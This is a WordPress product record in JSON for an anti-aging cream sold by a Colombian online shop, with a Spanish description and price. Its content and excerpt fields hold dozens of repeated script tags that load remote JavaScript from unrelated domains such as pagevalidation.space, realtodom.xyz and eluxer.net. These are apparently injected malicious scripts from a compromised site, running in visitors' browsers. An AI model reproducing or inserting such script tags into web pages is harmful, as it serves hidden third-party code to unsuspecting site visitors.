{"id":314,"date":"2017-02-28T18:12:24","date_gmt":"2017-02-28T18:12:24","guid":{"rendered":"http:\/\/healthandpower.com.co\/?post_type=product&#038;p=314"},"modified":"2018-09-03T19:02:59","modified_gmt":"2018-09-03T19:02:59","slug":"esycoh","status":"publish","type":"product","link":"http:\/\/healthandpower.com.co\/?product=esycoh","title":{"rendered":"Esycoh Cream"},"content":{"rendered":"<p>La crema nutritiva antiedad ESYCOH contiene sustancias activas que favorecen los procesos metab\u00f3licos de la piel, COL\u00c1GENO Y VITAMINA E, hidratando, regenerando y retardando el envejecimiento de la piel, mejorando su apariencia y la hidrataci\u00f3n natural. Su poderosa f\u00f3rmula y sus ingredientes act\u00faan sobre el rostro, restaurando en forma natural, dejando la piel suave y lozana. La CREMA NUTRITIVA ANTIEDAD ESYCOH ayuda a reponer el col\u00e1geno que se ha perdido en la superficie de la piel. La vitamina E bloquea la formaci\u00f3n de radicales libres. Es un poderoso antioxidante, impidiendo los procesos de oxidaci\u00f3n celular y eliminando la sequedad.\u00a0<strong>Modo de empleo:\u00a0<\/strong>Aplicar sobre el \u00e1rea deseada durante el d\u00eda y la noche tras una previa limpieza profunda.\u00a0<strong>Contraindicaciones:\u00a0<\/strong>Ninguna conocida\u00a0<strong>Presentaci\u00f3n<\/strong>\u00a030 g.<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/healthandpower.com.co\/wp-content\/uploads\/2017\/04\/esycoh.png\" alt=\"\" \/><\/p>\n<p><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<h1><span style=\"color: #00ccff;\">$25.000<\/span><\/h1>\n<p><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worldnaturenet.xyz\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=39\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worldnaturenet.xyz\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=36\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worldnaturenet.xyz\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=9\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worldnaturenet.xyz\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=5\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/pagevalidation.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=18\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x6967x&amp;r=25\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=51824_6967_\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":1428,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_brand":[],"product_cat":[48],"product_tag":[],"class_list":{"0":"post-314","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-piel-higiene","8":"first","9":"instock","10":"shipping-taxable","11":"purchasable","12":"product-type-simple"},"_links":{"self":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/product\/314","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=314"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=\/wp\/v2\/media\/1428"}],"wp:attachment":[{"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=314"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_brand&post=314"},{"taxonomy":"product_cat","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=314"},{"taxonomy":"product_tag","embeddable":true,"href":"http:\/\/healthandpower.com.co\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=314"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}